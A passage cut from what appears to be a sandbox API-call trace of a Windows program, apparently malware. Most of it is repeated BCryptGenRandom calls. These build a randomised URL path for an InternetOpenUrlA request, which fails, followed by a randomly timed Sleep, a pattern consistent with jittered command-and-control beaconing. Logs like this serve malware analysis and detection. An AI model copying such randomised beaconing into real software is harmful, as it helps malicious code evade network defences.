| out: pbBuffer=0x46ffd5f) returned 0x0 [0239.144] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.144] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.144] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.144] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.144] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.144] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.144] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.144] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.145] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.145] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.145] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.145] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.145] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.521] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.523] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.523] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.523] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.524] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.524] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.525] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.525] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.525] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.525] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.526] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.526] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.526] GetProcessHeap () returned 0x440000 [0239.526] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473770 [0239.526] lstrcpyA (in: lpString1=0x473770, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0239.526] lstrcatA (in: lpString1="\x04", lpString2="/fdcdxuryvflklh7hx85tC3BzgupgcOvJfqHJ/jii4qejKSnmq6dje215ifvu/uoklbb9Zxz1o3mp2xx9dhlikt6dy422am1kmvwk4q7i2/" | out: lpString1="\x04/fdcdxuryvflklh7hx85tC3BzgupgcOvJfqHJ/jii4qejKSnmq6dje215ifvu/uoklbb9Zxz1o3mp2xx9dhlikt6dy422am1kmvwk4q7i2/") returned="\x04/fdcdxuryvflklh7hx85tC3BzgupgcOvJfqHJ/jii4qejKSnmq6dje215ifvu/uoklbb9Zxz1o3mp2xx9dhlikt6dy422am1kmvwk4q7i2/" [0239.526] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0239.527] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/fdcdxuryvflklh7hx85tC3BzgupgcOvJfqHJ/jii4qejKSnmq6dje215ifvu/uoklbb9Zxz1o3mp2xx9dhlikt6dy422am1kmvwk4q7i2/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0239.527] GetProcessHeap () returned 0x440000 [0239.527] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473770 | out: hHeap=0x440000) returned 1 [0239.527] GetProcessHeap () returned 0x440000 [0239.527] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a17ca0 | out: hHeap=0x440000) returned 1 [0239.527] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0239.527] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0239.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0239.528] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0239.528] Sleep (dwMilliseconds=0x1abdd) [0239.771] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.771] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0239.772] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0239.772] GetProcessHeap () returned 0x440000 [0239.772] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d5e20 [0239.772] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0239.772] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e21, cbBuffer=0x2e, dwFlags=0x2 | out: pbBuffer=0x4d5e21) returned 0x0 [0239.773] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.773] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0239.773] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.773] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.773] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.773] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.773] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.774] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.774] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.774] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.774] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.774] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.774] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.774] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.775] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.775] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.775] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.775] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.775] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.775] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.775] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.775] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.776] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.776] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.776] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.776] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.776] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.776] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.776] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.776] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.776] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.777] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.777] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.777] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.777] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.778] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.778] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.778] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.778] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.778] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.779] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.779] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.779] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.779] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.780] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.780] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0239.780] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.780] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.780] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.780] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.780] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.780] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.781] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.781] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.781] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.781] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.781] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.781] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0239.781] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.782] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e4f, cbBuffer=0x2f, dwFlags=0x2 | out: pbBuffer=0x4d5e4f) returned 0x0 [0239.782] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.782] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.783] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.783] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.783] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.783] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.783] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.783] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0239.783] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.784] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.784] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.784] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.784] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.784] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.784] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.784] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.785] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.785] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.785] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0239.785] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.786] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.786] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.786] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.786] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.786] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.786] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.786] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.786] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.787] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.787] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.787] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.787] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.787] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.787] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.787] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.787] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.788] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.788] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.788] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.788] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.788] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.788] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.788] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.788] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.789] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: 